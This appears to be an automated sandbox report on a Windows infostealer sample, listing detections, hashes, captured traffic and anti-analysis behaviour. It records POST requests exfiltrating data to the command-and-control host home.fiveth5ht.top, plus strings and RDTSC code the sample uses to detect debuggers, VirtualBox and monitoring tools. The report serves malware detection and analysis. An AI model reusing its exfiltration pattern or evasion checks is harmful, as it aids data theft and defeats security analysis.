Windows Analysis Report
FIyDwZM4OR.exe

Overview

General Information

Sample name: FIyDwZM4OR.exe (renamed because original name is a hash value)
Original sample name: 81faa857e0e440955735ed78a8c61ddd.exe
Analysis ID: 1581622
MD5: 81faa857e0e440955735ed78a8c61ddd
SHA1: c13ce342d65ff323711b7a8829bcc3f94a3cfe56
SHA256: 0db9a16d15b04d332d6f96fea01b0c31662105d3097f340ed124c7357a964072
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • FIyDwZM4OR.exe (PID: 6908 cmdline: "C:\Users\user\Desktop\FIyDwZM4OR.exe" MD5: 81FAA857E0E440955735ED78A8C61DDD)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: FIyDwZM4OR.exe | Avira: detected
Source: FIyDwZM4OR.exe | Virustotal: Detection: 59%
Source: FIyDwZM4OR.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: FIyDwZM4OR.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00EBDCF0 -----BEGIN PUBLIC KEY-----
Source: FIyDwZM4OR.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: FIyDwZM4OR.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00E9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E9255D
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00E929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00E929FF
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 | Host: home.fiveth5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 561676
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 | Host: home.fiveth5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 143 | Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d | Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 81.29.149.125
Source: Joe Sandbox View | IP Address: 3.218.7.103
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00E97770 recv,0_2_00E97770
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknown | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 | Host: home.fiveth5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 561676
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: FIyDwZM4OR.exe, 00000000.00000002.1797628720.000000000093E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: FIyDwZM4OR.exe, 00000000.00000003.1776258710.00000000009C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: FIyDwZM4OR.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: FIyDwZM4OR.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: FIyDwZM4OR.exe, FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: FIyDwZM4OR.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443

System Summary

Source: FIyDwZM4OR.exe | Static PE information: section name:
Source: FIyDwZM4OR.exe | Static PE information: section name: .idata
Source: FIyDwZM4OR.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_3_009C8011
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_3_009C905E
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00F5B180
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00EA05B0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00EA6FA0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00EA10E6
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00F600E0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_0121A000
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_0121E050
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00EF6210
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00F5C320
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_012035B0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00F60420
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_011FD430
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_011F6730
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_012217A0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_01214780
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00E9E620
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00F5C770
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_011E9920
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00F49880
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00E9A960
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00EA4940
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00F4C900
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_01208BF0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_01201BD0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00ED1BE0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_01213A70
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00E9CBB0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_01066AC0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_01214D40
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_0120CD80
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00EA5DB0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_0121CC90
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_011F7CC0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00EA3ED0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00EB5EB0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_011E2F90
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_011AAE30
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00F5EF90
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00F58F90
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00EB4F70
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: String function: 00E971E0 appears 42 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: String function: 00F744A0 appears 72 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: String function: 00E973F0 appears 86 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: String function: 00ED4F40 appears 174 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: String function: 00E975A0 appears 530 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: String function: 00ED4FD0 appears 183 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: String function: 0106CBC0 appears 81 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: String function: 01047220 appears 78 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: String function: 00EACCD0 appears 38 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: String function: 00E9CAA0 appears 40 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: String function: 00EACD40 appears 40 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: String function: 00ED50A0 appears 31 times
Source: FIyDwZM4OR.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: FIyDwZM4OR.exe | Static PE information: Section: eqinbttk ZLIB complexity 0.9943833705357142
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00E9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E9255D
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00E931D7 CreateToolhelp32Snapshot,CloseHandle,0_2_00E931D7
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: FIyDwZM4OR.exe | Virustotal: Detection: 59%
Source: FIyDwZM4OR.exe | ReversingLabs: Detection: 65%
Source: FIyDwZM4OR.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: FIyDwZM4OR.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Section loaded: kernel.appcore.dll
Source: FIyDwZM4OR.exe | Static file information: File size 4464128 > 1048576
Source: FIyDwZM4OR.exe | Static PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: FIyDwZM4OR.exe | Static PE information: Raw size of eqinbttk is bigger than: 0x100000 < 0x1b5800

Data Obfuscation

Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Unpacked PE file: 0.2.FIyDwZM4OR.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;eqinbttk:EW;yeuqavua:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;eqinbttk:EW;yeuqavua:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: FIyDwZM4OR.exe | Static PE information: real checksum: 0x44fa66 should be: 0x44af86
Source: FIyDwZM4OR.exe | Static PE information: section name:
Source: FIyDwZM4OR.exe | Static PE information: section name: .idata
Source: FIyDwZM4OR.exe | Static PE information: section name:
Source: FIyDwZM4OR.exe | Static PE information: section name: eqinbttk
Source: FIyDwZM4OR.exe | Static PE information: section name: yeuqavua
Source: FIyDwZM4OR.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_3_009CC399 push eax; ret 0_3_009CC3A1
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_3_009D64FC pushad ; ret 0_3_009D64FD
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_3_009D6260 push es; retf 0_3_009D62BC
Source: FIyDwZM4OR.exe | Static PE information: section name: eqinbttk entropy: 7.954236983875095

Boot Survival

Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\FIyDwZM4OR.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E5010 second address: 16E5015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E414C second address: 16E4158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E42A1 second address: 16E42EE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEA75194B4Ch 0x00000008 push ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FEA75194B50h 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FEA75194B54h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e jmp 00007FEA75194B4Fh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E42EE second address: 16E42F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FEA75199F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E445E second address: 16E4462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E4625 second address: 16E465E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F79h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FEA75199F71h 0x00000010 popad 0x00000011 jnp 00007FEA75199F6Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E708E second address: 16E70D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add ecx, 2EA81F3Eh 0x00000012 push 00000000h 0x00000014 push C7C3CDCCh 0x00000019 jl 00007FEA75194B63h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FEA75194B55h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E70D8 second address: 16E7137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 383C32B4h 0x0000000d sub edx, dword ptr [ebp+122D3745h] 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FEA75199F68h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov esi, dword ptr [ebp+122D3292h] 0x00000035 push 00000000h 0x00000037 mov ecx, ebx 0x00000039 push 00000003h 0x0000003b jng 00007FEA75199F66h 0x00000041 push DEAC6EB1h 0x00000046 pushad 0x00000047 jns 00007FEA75199F6Ch 0x0000004d push eax 0x0000004e push edx 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E7316 second address: 16E732F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B54h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E73DD second address: 16E73E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E73E1 second address: 16E73E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E73E7 second address: 16E7404 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEA75199F68h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA75199F6Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E7404 second address: 16E740A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E740A second address: 16E740E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16E740E second address: 16E7412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16FA242 second address: 16FA276 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FEA75199F74h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 16FA276 second address: 16FA27A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 170902E second address: 1709042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F6Eh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1709042 second address: 1709051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1709051 second address: 1709057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1709057 second address: 170905C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1706FFC second address: 1707000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1707000 second address: 170700C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FEA75194B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe RDTSC instruction interceptor: First address: 1707176 second address: 170719C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FEA75199F76h 0x0000000c pushad 0x0000000d jl 00007FEA75199F66h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
